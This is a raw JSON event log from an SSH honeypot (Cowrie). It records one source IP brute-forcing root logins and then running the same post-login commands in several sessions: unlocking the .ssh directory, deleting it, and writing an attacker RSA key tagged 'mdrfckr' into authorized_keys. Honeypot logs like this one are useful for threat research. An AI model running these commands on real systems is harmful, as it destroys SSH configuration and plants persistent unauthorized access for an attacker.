AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T18:49:22.773746Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T18:49:23.079554Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:23.080583Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56350,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f7ce81da4a9","protocol":"ssh","message":"New connection: 212.227.235.229:56350 (1.2.3.4:22) [session: 6f7ce81da4a9]","sensor":"my-vps","timestamp":"2025-09-08T18:49:23.385663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:49:23.386559Z","src_ip":"212.227.235.229","session":"6f7ce81da4a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:49:23.692825Z","src_ip":"212.227.235.229","session":"6f7ce81da4a9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T18:49:24.959363Z","src_ip":"212.227.235.229","session":"6f7ce81da4a9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:26.268665Z","src_ip":"212.227.235.229","session":"6f7ce81da4a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":20592,"dst_ip":"1.2.3.4","dst_port":22,"session":"a173bcad8891","protocol":"ssh","message":"New connection: 212.227.235.229:20592 (1.2.3.4:22) [session: a173bcad8891]","sensor":"my-vps","timestamp":"2025-09-08T18:49:26.571338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:49:26.572208Z","src_ip":"212.227.235.229","session":"a173bcad8891"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:49:26.876584Z","src_ip":"212.227.235.229","session":"a173bcad8891"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:49:28.135618Z","src_ip":"212.227.235.229","session":"a173bcad8891"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:28.441425Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:28.442518Z","src_ip":"212.227.235.229","session":"a173bcad8891"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34062,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a95c6672c7f","protocol":"ssh","message":"New connection: 212.227.235.229:34062 (1.2.3.4:22) [session: 6a95c6672c7f]","sensor":"my-vps","timestamp":"2025-09-08T18:49:37.157130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:49:37.158139Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:49:37.427033Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.login.success","username":"root","password":"Asdfgh2025","message":"login attempt [root/Asdfgh2025] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:49:38.550741Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:49:39.173364Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:49:39.174128Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:49:39.175494Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:39.450777Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:49:40.090074Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T18:49:40.090767Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T18:49:40.364142Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:40.364831Z","src_ip":"212.227.235.229","session":"6a95c6672c7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34172,"dst_ip":"1.2.3.4","dst_port":22,"session":"50fc1160bf10","protocol":"ssh","message":"New connection: 212.227.235.229:34172 (1.2.3.4:22) [session: 50fc1160bf10]","sensor":"my-vps","timestamp":"2025-09-08T18:49:40.642026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:49:40.642983Z","src_ip":"212.227.235.229","session":"50fc1160bf10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:49:40.912580Z","src_ip":"212.227.235.229","session":"50fc1160bf10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35751,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7bf60162e1b","protocol":"ssh","message":"New connection: 212.227.235.229:35751 (1.2.3.4:22) [session: e7bf60162e1b]","sensor":"my-vps","timestamp":"2025-09-08T18:49:41.413937Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":5932,"dst_ip":"1.2.3.4","dst_port":22,"session":"432f79450641","protocol":"ssh","message":"New connection: 212.227.235.229:5932 (1.2.3.4:22) [session: 432f79450641]","sensor":"my-vps","timestamp":"2025-09-08T18:49:41.561937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-08T18:49:41.562703Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-08T18:49:41.681626Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T18:49:42.048246Z","src_ip":"212.227.235.229","session":"50fc1160bf10"}
{"eventid":"cowrie.login.success","username":"root","password":"Brutus","message":"login attempt [root/Brutus] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:49:42.196126Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:49:42.450963Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:49:42.451660Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:49:42.452506Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:42.733137Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:49:42.918953Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T18:49:42.919607Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.040405Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.041250Z","src_ip":"212.227.235.229","session":"432f79450641"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":20117,"dst_ip":"1.2.3.4","dst_port":22,"session":"c64806a7fc92","protocol":"ssh","message":"New connection: 212.227.235.229:20117 (1.2.3.4:22) [session: c64806a7fc92]","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.158353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.159247Z","src_ip":"212.227.235.229","session":"c64806a7fc92"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.278155Z","src_ip":"212.227.235.229","session":"c64806a7fc92"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.318384Z","src_ip":"212.227.235.229","session":"50fc1160bf10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34178,"dst_ip":"1.2.3.4","dst_port":22,"session":"47c442819f6e","protocol":"ssh","message":"New connection: 212.227.235.229:34178 (1.2.3.4:22) [session: 47c442819f6e]","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.597676Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.598634Z","src_ip":"212.227.235.229","session":"47c442819f6e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T18:49:43.792545Z","src_ip":"212.227.235.229","session":"c64806a7fc92"}
